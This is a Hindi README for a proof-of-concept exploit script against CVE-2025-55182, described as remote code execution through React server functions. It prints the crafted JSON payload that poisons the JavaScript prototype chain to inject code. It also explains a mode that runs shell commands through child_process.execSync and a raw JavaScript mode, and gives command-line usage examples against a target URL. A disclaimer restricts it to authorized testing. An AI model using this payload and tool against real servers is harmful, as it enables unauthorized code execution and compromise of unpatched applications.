
यह CVE-2025-55182 (React SSR RCE) के लिए एक POC स्क्रिप्ट है
यह POC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। यह भेद्यता प्रभावित पैकेजों के नवीनतम संस्करणों में पैच की जा चुकी है। इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। मैं आपके विरुद्ध किसी भी कानूनी कार्रवाई के लिए उत्तरदायी नहीं हूँ।
यह एक्सप्लॉइट एक विशेष रूप से तैयार किया गया JSON ऑब्जेक्ट बनाता है जो जावास्क्रिप्ट की प्रोटोटाइप श्रृंखला का दुरुपयोग करता है:
{
"then": "$1:__proto__:then", // प्रोटोटाइप श्रृंखला को दूषित करता है
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": jsCode, // इंजेक्ट किया गया दुर्भावनापूर्ण कोड
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
POC दो मोड का समर्थन करता है:
स्टैंडर्ड मोड (डिफ़ॉल्ट):
process.mainModule.require("child_process").execSync("YOUR_COMMAND");
शेल कमांड को Node.js के child_process के माध्यम से निष्पादन के लिए लपेटता है।
रॉ मोड (--raw फ़्लैग):
// मनमाना जावास्क्रिप्ट सीधे निष्पादित करता है
शेल कमांड रैपिंग के बिना सीधे जावास्क्रिप्ट कोड निष्पादन की अनुमति देता है।
bun run index.ts <command_file> <target_url>
उदाहरण:
# एक कमांड फ़ाइल बनाएँ
echo "whoami" > cmd.txt
# भेद्य एंडपॉइंट के विरुद्ध निष्पादित करें
bun run index.ts cmd.txt http://localhost:3000
bun run index.ts --raw <js_file> <target_url>
उदाहरण:
# जावास्क्रिप्ट पेलोड बनाएँ
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js
# रॉ जावास्क्रिप्ट निष्पादित करें
bun run index.ts --raw payload.js http://localhost:3000
<file_path>: वह फ़ाइल का पथ जिसमें कमांड या जावास्क्रिप्ट कोड है।<target_url>: React सर्वर फ़ंक्शन एंडपॉइंट का URL।--raw: (वैकल्पिक) शेल कमांड के बजाय रॉ जावास्क्रिप्ट निष्पादित करें।खोजकर्ता: लचलान डेविडसन
प्रकटकर्ता: React टीम और मेटा सुरक्षा